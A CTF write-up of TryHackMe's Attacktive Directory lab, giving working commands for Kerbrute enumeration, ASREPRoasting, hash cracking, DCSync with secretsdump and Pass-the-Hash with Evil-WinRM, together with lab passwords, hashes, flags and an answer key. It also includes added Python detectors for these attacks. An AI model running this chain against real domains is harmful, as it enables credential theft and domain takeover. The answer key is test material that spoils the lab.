
Attacktive Directory — TryHackMe CTF

Full Active Directory compromise chain: Kerbrute user enum → ASREPRoasting → hash crack → SMB credential pivot → DCSync via Impacket → Pass-the-Hash with Evil-WinRM. Three flags captured. Full domain compromise from zero credentials.

TryHackMe | Medium | Apr 2026 | 0xb0rn3 | oxbv1

Overview

A Windows Server Active Directory target on the domain spookysec.local (NetBIOS: THM-AD). The attack starts with zero credentials — Kerbrute enumerates valid domain users, ASREPRoasting extracts a crackable Kerberos hash for a service account with pre-auth disabled, SMB enumeration with those credentials recovers base64-encoded backup account credentials, and DCSync via Impacket's secretsdump.py dumps the Administrator NTLM hash for a final Pass-the-Hash login via Evil-WinRM.

Nmap → Kerberos/LDAP/SMB enum → enum4linux (NetBIOS: THM-AD) → Kerbrute userenum → valid users: svc-admin, backup, administrator... → GetNPUsers.py → svc-admin ASREPRoast hash (etype 23) → hashcat -m 18200 → management2005 → smbclient -L → 6 shares → backup share → backup_credentials.txt → base64 decode → backup@spookysec.local:backup2517860 → secretsdump.py -just-dc (DRSUAPI) → Administrator NTLM hash → evil-winrm -H 0e0363213e37b94221497260b0bcb4fc → DOMAIN ADMIN

Reconnaissance

Port       Service                  Significance
53/tcp     DNS (Simple DNS Plus)    Domain: spookysec.local
88/tcp     Kerberos                 ASREPRoast / Kerberoast target
139/tcp    NetBIOS                  enum4linux → THM-AD
389/tcp    LDAP                     Domain enumeration
445/tcp    SMB                      Share enum + credential pivot
3268/tcp   LDAP Global Catalog      Forest-wide queries
3389/tcp   RDP                      CN: AttacktiveDirectory.spookysec.local
5985/tcp   WinRM                    Evil-WinRM target

SMB / NetBIOS Enumeration

enum4linux -U -S TARGET
# NetBIOS-Domain Name: THM-AD
# Domain: spookysec.local  |  TLD: .local (non-standard / invalid for public DNS)

Step 1 — User Enumeration via Kerbrute

Kerbrute enumerates usernames by sending a Kerberos AS-REQ for each candidate and checking whether the DC answers with KDC_ERR_C_PRINCIPAL_UNKNOWN (no such user) or with anything else (the user exists, whether or not pre-auth is required). From the perspective of classic logon auditing this is silent: it generates no Windows logon failures (no event 4625) and bypasses most SIEM alerting rules tuned for LDAP/SMB brute force. It is not invisible, though: where Kerberos authentication service auditing is enabled, each probe leaves a 4768 event with result code 0x6 on the DC, and a burst of those from a single client address is the signal to alert on.

kerbrute userenum --dc TARGET --domain spookysec.local userlist.txt

# VALID USERNAME: james@spookysec.local
# VALID USERNAME: svc-admin@spookysec.local
# VALID USERNAME: robin@spookysec.local
# VALID USERNAME: darkstar@spookysec.local
# VALID USERNAME: administrator@spookysec.local
# VALID USERNAME: backup@spookysec.local
# VALID USERNAME: paradox@spookysec.local

Two accounts stand out immediately: svc-admin (service account — likely has pre-auth disabled for legacy compatibility) and backup (DC backup account — often has elevated replication rights).

Step 2 — ASREPRoasting

When a domain account has "Do not require Kerberos preauthentication" set, anyone can request a TGT from the DC for that user without knowing the password. The DC hands back an AS-REP whose encrypted part is keyed with the user's long-term key (for RC4-HMAC, etype 23, that key is the NT hash itself), so the password can be cracked offline against that blob. svc-admin has this flag set.

python3 GetNPUsers.py spookysec.local/ \
    -usersfile users.txt -no-pass \
    -dc-ip TARGET -format hashcat

# $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:<hash>
# Hash type: Kerberos 5 AS-REP etype 23 → hashcat mode 18200

Why Kerberos Pre-Auth Matters

Pre-authentication forces the client to prove knowledge of the password before the AS-REP is issued. Without it, the KDC encrypts a session key with the account's password hash and ships it to anyone who asks — turning offline hash cracking into a trivially exploitable primitive. Any service account or legacy app that requires this flag disabled is an ASREPRoast target.
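The two signals described in Step 1 and Step 2 (a burst of unknown-principal AS-REQ failures, and a TGT issued to an account that sent no pre-auth data) can be turned into detection logic. The Python below is an added example for this writeup, not code from the writeup, from Kerbrute or from Impacket. It models Windows Security event 4768 records as dicts; the result code, pre-auth type and ticket encryption type values are the ones Windows logs, while the record layout, timestamps, client addresses, account names and the alert threshold are constructed for the example.

```python
"""Detection logic for the two Kerberos AS-REQ abuses in this chain (added
example; not code from the writeup, Kerbrute or Impacket).

Models Windows Security event 4768 ("A Kerberos authentication ticket (TGT)
was requested") as dicts and flags:
  1. username enumeration: a burst of 4768 events with Result Code 0x6
     (KDC_ERR_C_PRINCIPAL_UNKNOWN) from one client address in a short window;
  2. ASREPRoast-style requests: a successful 4768 with Pre-Authentication
     Type 0 (no pre-auth data) and Ticket Encryption Type 0x17 (RC4-HMAC).
Events, addresses and thresholds are constructed for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # 4768 Result Code: user does not exist
KDC_SUCCESS = "0x0"
PREAUTH_NONE = "0"                    # Pre-Authentication Type 0: no pre-auth sent
ETYPE_RC4_HMAC = "0x17"               # etype 23, the one ASREPRoast asks for


def event(time, account, client, result, preauth="2", etype="0x12"):
    """One constructed 4768-shaped record (defaults model a normal AES256 logon
    with PA-ENC-TIMESTAMP pre-auth)."""
    return {"time": time, "account": account, "client": client,
            "result": result, "preauth_type": preauth, "etype": etype}


# Constructed sample log: six unknown-user probes in ten seconds from one host,
# one stray typo from another host, a pre-auth-less RC4 TGT for svc-admin,
# a normal logon for james, and a late single failure outside the window.
SAMPLE_4768 = [
    event("2026-04-20T10:00:01", "aaron",     "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "-"),
    event("2026-04-20T10:00:02", "abby",      "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "-"),
    event("2026-04-20T10:00:03", "abigail",   "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "-"),
    event("2026-04-20T10:00:05", "adam",      "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "-"),
    event("2026-04-20T10:00:07", "admin",     "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "-"),
    event("2026-04-20T10:00:10", "aiden",     "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "-"),
    event("2026-04-20T10:00:12", "jmaes",     "10.10.14.9", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "-"),
    event("2026-04-20T10:00:15", "svc-admin", "10.10.14.5", KDC_SUCCESS, PREAUTH_NONE, ETYPE_RC4_HMAC),
    event("2026-04-20T10:03:00", "james",     "10.10.14.9", KDC_SUCCESS),
    event("2026-04-20T10:05:00", "zed",       "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "-"),
]


def detect_enumeration(events, threshold=5, window=timedelta(minutes=1)):
    """Return {client: peak_count} for clients that produced at least
    `threshold` unknown-principal failures inside any sliding window."""
    failures = defaultdict(list)
    for e in events:
        if e["result"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            failures[e["client"]].append(datetime.fromisoformat(e["time"]))
    hits = {}
    for client, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window forward
                start += 1
            count = end - start + 1
            if count >= threshold:
                hits[client] = max(hits.get(client, 0), count)
    return hits


def detect_asrep_roast(events):
    """Return (account, client) pairs for successful TGT requests that sent no
    pre-auth data and were issued with RC4: the footprint of an AS-REP
    request against an account with pre-auth disabled."""
    return [(e["account"], e["client"]) for e in events
            if e["result"] == KDC_SUCCESS
            and e["preauth_type"] == PREAUTH_NONE
            and e["etype"] == ETYPE_RC4_HMAC]


if __name__ == "__main__":
    print("enumeration sources:", detect_enumeration(SAMPLE_4768))
    print("pre-auth-less RC4 TGTs:", detect_asrep_roast(SAMPLE_4768))
```

On the constructed log the first check reports 10.10.14.5 with a peak of six failures in one window (the lone typo from 10.10.14.9 and the late failure at 10:05 stay below threshold), and the second reports svc-admin, which is also the list of accounts to audit for the pre-auth flag. Tune `threshold` and `window` to the environment; a DC that logs no 4768 at all means the Kerberos Authentication Service audit subcategory is off and needs enabling first.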

Step 3 — Hash Cracking

# hashcat (GPU)
hashcat -m 18200 hash.txt passwordlist.txt --force

# john (CPU)
john --format=krb5asrep --wordlist=passwordlist.txt hash.txt

svc-admin password: management2005

Step 4 — SMB Enumeration & Credential Pivot

smbclient -L //TARGET -U 'svc-admin%management2005'
# → 6 shares: ADMIN$, C$, IPC$, NETLOGON, SYSVOL, backup

smbclient //TARGET/backup -U 'svc-admin%management2005' \
    -c 'get backup_credentials.txt'

cat backup_credentials.txt
# YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

echo 'YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw' | base64 -d
# backup@spookysec.local:backup2517860

svc-admin flag: TryHackMe{K3rb3r0s_Pr3_4uth}
backup flag: TryHackMe{B4ckM3UpSc0tty!}

Step 5 — DCSync via secretsdump.py

The backup account holds the Replicating Directory Changes and Replicating Directory Changes All rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) on the domain object, the same rights legitimate Domain Controllers use to sync AD data between themselves. Impacket's secretsdump.py abuses these rights to perform a DCSync attack: it impersonates a DC requesting replication and receives the NTLM hashes of every domain account over the DRSUAPI (MS-DRSR) RPC interface. No code runs on the target. No files are written to disk.

python3 secretsdump.py \
    -just-dc spookysec.local/backup:backup2517860@TARGET

# [*] Using the DRSUAPI method to get NTDS.DIT secrets
# Administrator:500:aad3b435...::0e0363213e37b94221497260b0bcb4fc:::
# svc-admin:1103:aad3b435...::fc0f1e5...:::
# backup:1118:aad3b435...::19feb5d...:::

DRSUAPI — No Touch, No Trace

DCSync via DRSUAPI is the preferred credential dumping method in modern red team ops. Unlike Mimikatz LSASS dumping, it requires no code on the DC, no AV evasion, and generates only legitimate-looking replication traffic. Defenders need to monitor for non-DC machines and non-DC accounts making GetNCChanges RPC calls. On the DC itself this surfaces as Security event 4662 carrying the replication control-access GUIDs (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 for DS-Replication-Get-Changes, 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 for DS-Replication-Get-Changes-All) with a subject that is not a DC computer account, but only when Directory Service Access auditing is enabled, and most default SIEM configurations miss this entirely.
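The monitoring rule described above, as an added example (not code from the writeup or from Impacket): it parses the Properties field of constructed Security event 4662 records, extracts the control-access GUIDs, and flags any subject exercising replication rights that is neither a known DC computer account nor an explicitly documented sync account. The three replication GUIDs are the real AD extended-rights values; the event records, account names, DC list and allowlist are constructed for the example.

```python
"""DCSync detection over Security event 4662 (added example; not code from
the writeup or from Impacket).

4662 ("An operation was performed on an object") is raised on the DC when a
principal exercises a control-access right on the domain naming context and
Directory Service Access auditing is on. Its Properties field lists the
access type and one GUID per line. Replication by a non-DC subject is the
DCSync footprint. Events, names and lists below are constructed.
"""
import re

# Real AD extended-rights GUIDs that together allow replicating secrets.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(
    r"\{?([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\}?", re.I)

REPL_PROPS = ("Control Access\n"
              "\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
              "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")

# Constructed 4662-shaped records: DC-to-DC replication, the backup account
# pulling secrets, a documented directory-sync service account, and an
# ordinary attribute read (GUID constructed, not a replication right).
SAMPLE_4662 = [
    {"subject": "DC02$",       "object_type": "domainDNS", "access_mask": "0x100", "properties": REPL_PROPS},
    {"subject": "backup",      "object_type": "domainDNS", "access_mask": "0x100", "properties": REPL_PROPS},
    {"subject": "svc-aadsync", "object_type": "domainDNS", "access_mask": "0x100", "properties": REPL_PROPS},
    {"subject": "james",       "object_type": "user",      "access_mask": "0x10",
     "properties": "Read Property\n\t{12345678-1234-1234-1234-123456789abc}"},
]
DC_ACCOUNTS = frozenset({"DC01$", "DC02$"})      # constructed DC computer accounts
ALLOWLIST = frozenset({"svc-aadsync"})           # constructed, documented exception


def replication_rights(properties):
    """Names of replication rights present in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def find_dcsync(events, dc_accounts, allowlist=frozenset()):
    """Return (subject, [rights]) for every replication operation whose
    subject is not a DC computer account or an allowlisted sync account."""
    findings = []
    for e in events:
        rights = replication_rights(e["properties"])
        if not rights:
            continue                      # not a replication request
        subject = e["subject"]
        if subject in dc_accounts or subject in allowlist:
            continue                      # expected replication partner
        findings.append((subject, rights))
    return findings


if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_4662, DC_ACCOUNTS, ALLOWLIST):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

On the constructed log only backup is reported; drop the allowlist and the sync account is reported too, which is the right default until someone documents why it replicates. Matching on the subject name rather than source address is deliberate: 4662 carries no network address, and the DC list should come from the Domain Controllers OU rather than a hand-typed set.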

Step 6 — Pass-the-Hash via Evil-WinRM

With the Administrator NTLM hash, there's no need to crack it. Pass-the-Hash authenticates directly with the hash as the credential material over NTLM, and Evil-WinRM takes the NT hash via its -H flag:

evil-winrm -i TARGET -u Administrator \
    -H '0e0363213e37b94221497260b0bcb4fc'

# Evil-WinRM shell v3.x
# *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
# spookysec\administrator

Administrator flag: TryHackMe{4ctiveD1rectoryM4st3r}

Full Answer Reference

Question                                  Answer
Tool to enumerate port 139/445            enum4linux
NetBIOS-Domain Name                       THM-AD
Invalid TLD for AD domain                 .local
Kerbrute command for user enum            userenum
ASREPRoastable user                       svc-admin
Kerberos hash type                        Kerberos 5 AS-REP etype 23
Hashcat mode                              18200
svc-admin password                        management2005
SMB share mapping utility                 smbclient
Option to list shares                     -L
Number of remote shares                   6
Accessible share with text file           backup
File content (decoded)                    backup@spookysec.local:backup2517860
Method to dump NTDS.DIT                   DRSUAPI
Administrator NTLM hash                   0e0363213e37b94221497260b0bcb4fc
Attack using hash without password        Pass the Hash
Evil-WinRM option for hash                -H

Lessons Learned

  1. ASREPRoasting requires zero credentials. Any service account with pre-auth disabled is a publicly available offline cracking target. Audit with Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} and enforce pre-auth on all accounts.
  2. Sensitive files in SMB shares are goldmines. The backup_credentials.txt in plaintext (even base64-encoded) is an instant pivot. Shares should be audited regularly — least privilege on all.
  3. DCSync requires only replication rights, not DA. The backup account had dangerous permissions without being Administrator. Monitor non-DC accounts for DS-Replication-Get-Changes-All rights via BloodHound or PowerView.
  4. Pass-the-Hash makes cracking optional. NTLM hashes are usable as-is for lateral movement across Windows networks. Putting privileged accounts in the Protected Users group disables NTLM authentication for them, which blocks this attack vector; Credential Guard hardens LSASS so hashes are harder to steal from endpoints in the first place.
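The audit in lesson 1 can also be run from an LDAP export when no domain-joined PowerShell session is available. The Python below is an added example (not code from the writeup): it reads a small LDIF-style dump of the kind ldapsearch produces, decodes the userAccountControl bit field, and lists every account with DONT_REQ_PREAUTH set, noting whether the account is enabled. The flag bit values are the real userAccountControl constants; the LDIF text and account names are constructed for the example.

```python
"""Pre-auth audit from an LDAP export (added example; not code from the
writeup). Equivalent in intent to
    Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}
but works on raw userAccountControl values from an ldapsearch dump.
Bit values are the real AD constants; the LDIF below is constructed.
"""

# Subset of userAccountControl bits relevant to this audit (real values).
UAC_FLAGS = {
    0x0002:   "ACCOUNTDISABLE",
    0x0020:   "PASSWD_NOTREQD",
    0x0200:   "NORMAL_ACCOUNT",
    0x1000:   "WORKSTATION_TRUST_ACCOUNT",
    0x2000:   "SERVER_TRUST_ACCOUNT",
    0x10000:  "DONT_EXPIRE_PASSWORD",
    0x80000:  "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Constructed export: a normal user, an enabled service account with pre-auth
# off, a disabled legacy account with pre-auth off, and a DC computer account.
SAMPLE_LDIF = """\
dn: CN=james,CN=Users,DC=spookysec,DC=local
sAMAccountName: james
userAccountControl: 66048

dn: CN=svc-admin,CN=Users,DC=spookysec,DC=local
sAMAccountName: svc-admin
userAccountControl: 4260352

dn: CN=legacyapp,CN=Users,DC=spookysec,DC=local
sAMAccountName: legacyapp
userAccountControl: 4260354

dn: CN=DC01,OU=Domain Controllers,DC=spookysec,DC=local
sAMAccountName: DC01$
userAccountControl: 532480
"""


def parse_ldif(text):
    """Split blank-line-separated LDIF entries into dicts of attribute: value
    (single-valued attributes only, enough for this audit)."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        entries.append(current)
    return entries


def decode_uac(value):
    """Names of the known flags set in a userAccountControl integer."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def find_no_preauth(text):
    """Accounts whose userAccountControl has DONT_REQ_PREAUTH set, with their
    enabled state and decoded flags, in export order."""
    findings = []
    for entry in parse_ldif(text):
        uac = int(entry.get("userAccountControl", "0"))
        if uac & DONT_REQ_PREAUTH:
            findings.append({
                "name": entry["sAMAccountName"],
                "enabled": not (uac & ACCOUNTDISABLE),
                "flags": decode_uac(uac),
            })
    return findings


if __name__ == "__main__":
    for f in find_no_preauth(SAMPLE_LDIF):
        state = "ENABLED" if f["enabled"] else "disabled"
        print(f"{f['name']:<12} {state:<9} {' | '.join(f['flags'])}")
```

The enabled hits are the ASREPRoast exposure to fix first; disabled ones still matter because re-enabling the account silently brings the weakness back, so the flag should be cleared rather than relied upon. The same decoder answers the lesson 3 question about which accounts are trusted for delegation, since that is just another bit in the same field.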